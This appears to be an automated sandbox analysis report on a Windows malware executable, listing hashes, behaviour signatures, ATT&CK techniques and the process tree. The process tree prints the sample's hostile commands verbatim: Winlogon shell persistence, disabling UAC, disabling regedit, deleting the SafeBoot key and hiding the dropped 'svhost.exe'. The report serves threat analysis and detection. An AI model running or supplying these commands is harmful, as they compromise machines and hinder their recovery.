Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/09/2024, 00:56
Behavioral task
behavioral1
Sample
eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
-
Size
217KB
-
MD5
eec4b4c99ef12c3af34dbceb9bba0bd3
-
SHA1
5cdb384dc1b13b32fccb078093b8e7ea25c68053
-
SHA256
980d2ecca216194eb70a3cb502f039589f9a0c2b4fb37392c19144527423ea55
-
SHA512
92b3947cf1296b7fa9a899c4552ac74c406adda9df174155169f957e1c10a68c49dc856edb95ef25de1ea2e3bfa828f5e121415e3f1cb3587e49f89e9d55226b
-
SSDEEP
6144:OQVHddxtFrchQzcp63BkJhysb6PAE30aT:t59tFrcagQMynB
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Program Files\\Common Files\\Boot\\svhost.exe" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
resource yara_rule behavioral1/memory/2032-0-0x0000000000400000-0x0000000000D57000-memory.dmp upx -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 2812 cmd.exe 1284 cmd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\Boot\svhost.exe attrib.exe File opened for modification C:\Program Files\Common Files\Boot attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2060 reg.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2732 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2412 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 30 PID 2032 wrote to memory of 2412 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 30 PID 2032 wrote to memory of 2412 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 30 PID 2032 wrote to memory of 2412 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 30 PID 2032 wrote to memory of 3036 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 31 PID 2032 wrote to memory of 3036 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 31 PID 2032 wrote to memory of 3036 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 31 PID 2032 wrote to memory of 3036 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 31 PID 2032 wrote to memory of 1060 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 34 PID 2032 wrote to memory of 1060 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 34 PID 2032 wrote to memory of 1060 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 34 PID 2032 wrote to memory of 1060 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 34 PID 2032 wrote to memory of 3016 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 36 PID 2032 wrote to memory of 3016 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 36 PID 2032 wrote to memory of 3016 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 36 PID 2032 wrote to memory of 3016 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 36 PID 2032 wrote to memory of 2780 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 38 PID 2032 wrote to memory of 2780 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 38 PID 2032 wrote to memory of 2780 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 38 PID 2032 wrote to memory of 2780 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 38 PID 2032 wrote to memory of 1032 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 40 PID 2032 wrote to memory of 1032 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 40 PID 2032 wrote to memory of 1032 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 40 PID 2032 wrote to memory of 1032 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 40 PID 2032 wrote to memory of 1284 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 41 PID 2032 wrote to memory of 1284 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 41 PID 2032 wrote to memory of 1284 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 41 PID 2032 wrote to memory of 1284 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 41 PID 2032 wrote to memory of 2812 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 44 PID 2032 wrote to memory of 2812 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 44 PID 2032 wrote to memory of 2812 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 44 PID 2032 wrote to memory of 2812 2032 eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe 44 PID 2412 wrote to memory of 3040 2412 cmd.exe 46 PID 2412 wrote to memory of 3040 2412 cmd.exe 46 PID 2412 wrote to memory of 3040 2412 cmd.exe 46 PID 2412 wrote to memory of 3040 2412 cmd.exe 46 PID 2780 wrote to memory of 2756 2780 cmd.exe 47 PID 2780 wrote to memory of 2756 2780 cmd.exe 47 PID 2780 wrote to memory of 2756 2780 cmd.exe 47 PID 2780 wrote to memory of 2756 2780 cmd.exe 47 PID 1060 wrote to memory of 2880 1060 cmd.exe 48 PID 1060 wrote to memory of 2880 1060 cmd.exe 48 PID 1060 wrote to memory of 2880 1060 cmd.exe 48 PID 1060 wrote to memory of 2880 1060 cmd.exe 48 PID 3040 wrote to memory of 2732 3040 cmd.exe 49 PID 3040 wrote to memory of 2732 3040 cmd.exe 49 PID 3040 wrote to memory of 2732 3040 cmd.exe 49 PID 3040 wrote to memory of 2732 3040 cmd.exe 49 PID 3016 wrote to memory of 2060 3016 cmd.exe 50 PID 3016 wrote to memory of 2060 3016 cmd.exe 50 PID 3016 wrote to memory of 2060 3016 cmd.exe 50 PID 3016 wrote to memory of 2060 3016 cmd.exe 50 PID 3036 wrote to memory of 3028 3036 cmd.exe 51 PID 3036 wrote to memory of 3028 3036 cmd.exe 51 PID 3036 wrote to memory of 3028 3036 cmd.exe 51 PID 3036 wrote to memory of 3028 3036 cmd.exe 51 PID 1032 wrote to memory of 2760 1032 cmd.exe 52 PID 1032 wrote to memory of 2760 1032 cmd.exe 52 PID 1032 wrote to memory of 2760 1032 cmd.exe 52 PID 1032 wrote to memory of 2760 1032 cmd.exe 52 PID 2812 wrote to memory of 2896 2812 cmd.exe 53 PID 2812 wrote to memory of 2896 2812 cmd.exe 53 PID 2812 wrote to memory of 2896 2812 cmd.exe 53 PID 2812 wrote to memory of 2896 2812 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2192 attrib.exe 2896 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c cmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\cmd.execmd /c cmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\cmd.execmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
PID:2732
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\SysWOW64\reg.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\reg.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f3⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f3⤵
- Disables RegEdit via registry modification
- System Location Discovery: System Language Discovery
PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /f3⤵
- System Location Discovery: System Language Discovery
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Boot\svhost.exe"2⤵
- Hide Artifacts: Hidden Files and Directories
- System Location Discovery: System Language Discovery
PID:1284 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\Program Files\Common Files\Boot\svhost.exe"3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Boot"2⤵
- Hide Artifacts: Hidden Files and Directories
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\Program Files\Common Files\Boot"3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2896
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
3